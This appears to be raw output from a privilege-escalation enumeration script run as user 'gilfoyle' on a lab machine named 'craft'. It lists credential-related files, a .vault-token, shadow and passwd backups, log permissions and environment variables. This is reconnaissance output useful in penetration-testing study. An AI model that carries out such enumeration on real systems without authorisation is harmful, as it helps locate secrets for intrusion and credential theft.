2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/it/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/fr/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/fr/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/fr/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/fr/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/fr/[Link]
╔══════════╣ Unexpected in /opt (usually empty)
total 20
drwxr-xr-x 5 root root 4096 Feb 9 2019 .
drwxr-xr-x 22 root root 4096 Nov 16 2023 ..
drwx------ 3 root root 4096 Jun 16 2021 admin
drwx--x--x 4 root root 4096 Feb 2 2019 containerd
drwx------ 8 root root 4096 Feb 8 2019 storage
╔══════════╣ Unexpected in root
/[Link]
/[Link]
/[Link]
/vmlinuz
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/etc/hosts
/etc/[Link]
/home/gilfoyle/.gnupg/[Link]
/home/gilfoyle/.gnupg/[Link]
/var/log/[Link]
/var/log/syslog
/var/log/[Link]
/usr/local/etc/[Link]
logrotate 3.11.0
╔══════════╣ Syslog configuration (limit 50)
module(load="imuxsock") # provides support for local system logging
module(load="imklog") # provides kernel logging support
$ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat
$FileOwner root
$FileGroup adm
$FileCreateMode 0640
$DirCreateMode 0755
$Umask 0022
$WorkDirectory /var/spool/rsyslog
$IncludeConfig /etc/rsyslog.d/*.conf
auth,authpriv.* /var/log/[Link]
*.*;auth,[Link] -/var/log/syslog
daemon.* -/var/log/[Link]
kern.* -/var/log/[Link]
lpr.* -/var/log/[Link]
mail.* -/var/log/[Link]
user.* -/var/log/[Link]
[Link] -/var/log/[Link]
[Link] -/var/log/[Link]
[Link] /var/log/[Link]
*.=debug;\
auth,[Link];\
[Link];[Link] -/var/log/debug
*.=info;*.=notice;*.=warn;\
auth,[Link];\
cron,[Link];\
mail,[Link] -/var/log/messages
*.emerg :omusrmsg:*
╔══════════╣ Auditd configuration (limit 50)
auditd configuration Not Found
╔══════════╣ Log files with potentially weak perms (limit 50)
524318 268 -rw-r----- 1 root adm 274355 Jan 27 2021 /var/log/[Link]
535368 100 -rw-r----- 1 root adm 101846 Nov 30 05:13 /var/log/debug.1
524449 0 -rw-r--r-- 1 root adm 0 Jan 27 2021 /var/log/unattended-upgrades/[Link]
535630 4 -rw-r--r-- 1 root adm 3318 Jan 26 2021 /var/log/unattended-upgrades/[Link]
534346 4 -rw-r----- 1 root adm 2084 Nov 30 05:13 /var/log/[Link].1
534303 4 -rw-r----- 1 root adm 715 Jan 31 2021 /var/log/[Link]
526417 8 -rw-r----- 1 root adm 5752 Nov 30 08:15 /var/log/[Link]
534304 4 -rw-r----- 1 root adm 211 Jan 29 2021 /var/log/[Link]
526405 144 -rw-r----- 1 root adm 143563 Jun 17 2021 /var/log/[Link]
524501 20 -rw-r----- 1 root adm 19257 Jun 17 2021 /var/log/[Link]
524432 4 -rw-r----- 1 root adm 334 Jan 31 2021 /var/log/[Link]
524523 20 -rw-r----- 1 root adm 17771 Jan 28 2021 /var/log/[Link]
526428 0 -rw-r----- 1 root adm 0 Nov 30 06:25 /var/log/[Link]
526465 4 -rw-r----- 1 root adm 437 Nov 30 07:59 /var/log/messages
535370 540 -rw-r----- 1 root adm 545343 Nov 30 06:25 /var/log/messages.1
524448 204 -rw-r----- 1 root adm 207212 Jan 27 2021 /var/log/[Link]
534307 4 -rw-r----- 1 root adm 188 Jan 26 2021 /var/log/[Link]
534312 20 -rw-r----- 1 root adm 17795 Jan 31 2021 /var/log/[Link]
524346 20 -rw-r----- 1 root adm 17663 Jan 29 2021 /var/log/[Link]
534343 252 -rw-r----- 1 root adm 249947 Nov 30 06:25 /var/log/[Link].1
526413 72 -rw-r----- 1 root adm 72747 Jun 17 2021 /var/log/[Link]
526412 28 -rw-r----- 1 root adm 26010 Jun 17 2021 /var/log/[Link]
526411 4 -rw-r----- 1 root adm 144 Jun 17 2021 /var/log/[Link]
536677 72 -rw-r----- 1 root adm 72809 Jan 27 2021 /var/log/[Link]
534305 64 -rw-r----- 1 root adm 62026 Jan 31 2021 /var/log/[Link]
526418 4 -rw-r----- 1 root adm 284 Nov 30 07:59 /var/log/[Link]
534308 72 -rw-r----- 1 root adm 71645 Jan 26 2021 /var/log/[Link]
524317 28 -rw-r----- 1 root adm 23648 Nov 30 08:15 /var/log/syslog
526423 32 -rw-r----- 1 root adm 25682 Nov 30 08:15 /var/log/[Link]
534309 156 -rw-r----- 1 root adm 154691 Nov 30 06:09 /var/log/[Link].1
524349 20 -rw-r----- 1 root adm 17795 Jan 30 2021 /var/log/[Link]
534311 632 -rw-r----- 1 root adm 644237 Nov 30 05:14 /var/log/[Link].1
526460 0 -rw-r----- 1 root adm 0 Nov 30 06:25 /var/log/debug
525243 8 -rw-r----- 1 root adm 5095 Nov 16 2023 /var/log/apt/[Link]
525049 0 -rw-r----- 1 root adm 0 Nov 30 06:25 /var/log/apt/[Link]
530259 8 -rw-r----- 1 root adm 4226 Jan 26 2021 /var/log/apt/[Link]
534300 20 -rw-r----- 1 root adm 17668 Feb 1 2021 /var/log/[Link]
534301 980 -rw-r----- 1 root adm 998748 Nov 30 06:25 /var/log/syslog.1
524384 16 -rw-r----- 1 root adm 15408 Jan 27 2021 /var/log/[Link]
524446 100 -rw-r----- 1 root adm 98931 Jun 17 2021 /var/log/[Link]
526407 32 -rw-r----- 1 root adm 32442 Jun 17 2021 /var/log/[Link]
╔══════════╣ Files inside /home/gilfoyle (limit 20)
total 992
drwx------ 5 gilfoyle gilfoyle 4096 Nov 30 08:14 .
drwxr-xr-x 3 root root 4096 Feb 9 2019 ..
-rw-r--r-- 1 gilfoyle gilfoyle 634 Feb 9 2019 .bashrc
drwx------ 3 gilfoyle gilfoyle 4096 Feb 9 2019 .config
drwx------ 3 gilfoyle gilfoyle 4096 Nov 30 08:14 .gnupg
-rwxr-xr-x 1 gilfoyle gilfoyle 971926 Nov 15 10:04 [Link]
-rw-r--r-- 1 gilfoyle gilfoyle 148 Feb 8 2019 .profile
drwx------ 2 gilfoyle gilfoyle 4096 Feb 9 2019 .ssh
-r-------- 1 gilfoyle gilfoyle 33 Nov 30 05:13 [Link]
-rw------- 1 gilfoyle gilfoyle 36 Feb 9 2019 .vault-token
-rw------- 1 gilfoyle gilfoyle 2546 Feb 9 2019 .viminfo
╔══════════╣ Files inside others home (limit 20)
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Nov 30 06:25 /var/backups
total 1252
-rw-r--r-- 1 root root 40960 Nov 30 06:25 [Link].0
-rw-r--r-- 1 root root 1797 Jan 27 2021 [Link]
-rw-r--r-- 1 root root 2288 Feb 3 2019 [Link]
-rw-r--r-- 1 root root 12545 Nov 16 2023 apt.extended_states.0
-rw-r--r-- 1 root root 1402 Nov 5 2020 apt.extended_states.[Link]
-rw-r--r-- 1 root root 1347 Feb 9 2019 apt.extended_states.[Link]
-rw-r--r-- 1 root root 1472 Feb 9 2019 apt.extended_states.[Link]
-rw-r--r-- 1 root root 1620 Feb 9 2019 apt.extended_states.[Link]
-rw-r--r-- 1 root root 1686 Feb 6 2019 apt.extended_states.[Link]
-rw-r--r-- 1 root root 1586 Feb 2 2019 apt.extended_states.[Link]
-rw-r--r-- 1 root root 362 Feb 9 2019 [Link].0
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 174 Feb 9 2019 [Link]
-rw-r--r-- 1 root root 100 Nov 22 2018 [Link].0
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 120 Nov 22 2018 [Link]
-rw-r--r-- 1 root root 403144 Nov 16 2023 [Link].0
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw-r--r-- 1 root root 117070 Jan 26 2021 [Link]
-rw------- 1 root root 666 Feb 9 2019 [Link]
-rw------- 1 root shadow 557 Feb 9 2019 [Link]
-rw------- 1 root root 1379 Feb 9 2019 [Link]
-rw------- 1 root shadow 934 Feb 10 2019 [Link]
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 4096 Nov 30 08:14 /sys/devices/virtual/net/veth5687e2b/brport/backup_port
-rw-r--r-- 1 root root 4096 Nov 30 08:14 /sys/devices/virtual/net/veth7e1df0c/brport/backup_port
-rw-r--r-- 1 root root 4096 Nov 30 08:14 /sys/devices/virtual/net/vethe4fc99f/brport/backup_port
-rw-r--r-- 1 root root 4096 Nov 30 08:14 /sys/devices/virtual/net/veth7e96868/brport/backup_port
-rw-r--r-- 1 root root 4096 Nov 30 08:14 /sys/devices/virtual/net/vethdc12f9f/brport/backup_port
-rw-r--r-- 1 root root 4096 Nov 30 08:14 /sys/devices/virtual/net/vethaf27d62/brport/backup_port
-rw-r--r-- 1 root root 610 Nov 22 2018 /etc/xml/[Link]
-rw-r--r-- 1 root root 673 Nov 22 2018 /etc/xml/[Link]
-rw-r--r-- 1 root root 20 Apr 5 2019 /etc/vmware-tools/[Link]
-rw-r--r-- 1 root root 128 Nov 22 2018 /var/lib/sgml-base/[Link]
-rw-r--r-- 1 root root 303 May 15 2018 /usr/share/doc/hdparm/[Link]
-rw-r--r-- 1 root root 31664 Apr 5 2019 /usr/lib/open-vm-tools/plugins/vmsvc/[Link]
-rwxr-xr-x 1 root root 34632 Nov 5 2020 /usr/lib/vmware-tools/plugins64/vmsvc/[Link]
-rwxr-xr-x 1 root root 29888 Nov 5 2020 /usr/lib/vmware-tools/plugins32/vmsvc/[Link]
-rw-r--r-- 1 root root 14051 Sep 7 2023 /lib/modules/6.1.0-12-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/apt/[Link]
Found /var/lib/apt/[Link]
Found /var/lib/PackageKit/[Link]
-> Extracting tables from /var/lib/PackageKit/[Link] (limit 20)
╔══════════╣ Web files?(output limit)
╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 0 Nov 30 05:13 /run/network/.[Link]
-rw-r--r-- 1 root root 220 May 15 2017 /etc/skel/.bash_logout
-rw------- 1 root root 0 Nov 22 2018 /etc/.[Link]
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 40960 Nov 30 06:25 /var/backups/[Link].0
-rw-r--r-- 1 root root 2288 Feb 3 2019 /var/backups/[Link]
-rw-r--r-- 1 root root 1797 Jan 27 2021 /var/backups/[Link]
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/[Link]
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python2.7/dist-packages/keyring/[Link]
/usr/lib/python2.7/dist-packages/keyring/[Link]
/usr/lib/python3/dist-packages/keyring/[Link]
/usr/lib/python3/dist-packages/keyring/__pycache__/[Link]
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/[Link]
/usr/share/man/man1/[Link]
/usr/share/man/man1/[Link]
/usr/share/man/man1/[Link]
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man8/[Link]
/usr/share/man/man8/[Link]
/usr/share/man/man8/[Link]
/usr/share/man/man8/[Link]
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/var/cache/debconf/[Link]
/var/lib/pam/password
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
/var/log/[Link].1:2023-11-16 [Link] configure passwd:amd64 1:4.4-4.1+deb9u1 <none>
/var/log/[Link].1:2023-11-16 [Link] status half-configured passwd:amd64 1:4.4-4.1
/var/log/[Link].1:2023-11-16 [Link] status half-configured passwd:amd64 1:4.4-4.1+deb9u1
/var/log/[Link].1:2023-11-16 [Link] status half-installed passwd:amd64 1:4.4-4.1
/var/log/[Link].1:2023-11-16 [Link] status installed passwd:amd64 1:4.4-4.1+deb9u1
/var/log/[Link].1:2023-11-16 [Link] status unpacked passwd:amd64 1:4.4-4.1
/var/log/[Link].1:2023-11-16 [Link] status unpacked passwd:amd64 1:4.4-4.1+deb9u1
/var/log/[Link].1:2023-11-16 [Link] upgrade passwd:amd64 1:4.4-4.1 1:4.4-4.1+deb9u1
╔══════════╣ Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars
_=/bin/dd
_=/bin/grep
HOME=/home/gilfoyle
LANG=en_US.UTF-8
_=./[Link]
LOGNAME=gilfoyle
MAIL=/var/mail/gilfoyle
NOTIFY_SOCKET=/run/systemd/notify
PWD=/home/gilfoyle
SHELL=/bin/bash
SHLVL=1
SHLVL=2
SSH_CLIENT=[Link] 60846 22
SSH_CONNECTION=[Link] 60846 [Link] 22
SSH_TTY=/dev/pts/0
TERM=xterm-256color
USER=gilfoyle
_=/usr/bin/xxd
VAULT_ADDR=[Link]
XDG_RUNTIME_DIR=/run/user/1001
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
gilfoyle@craft:~$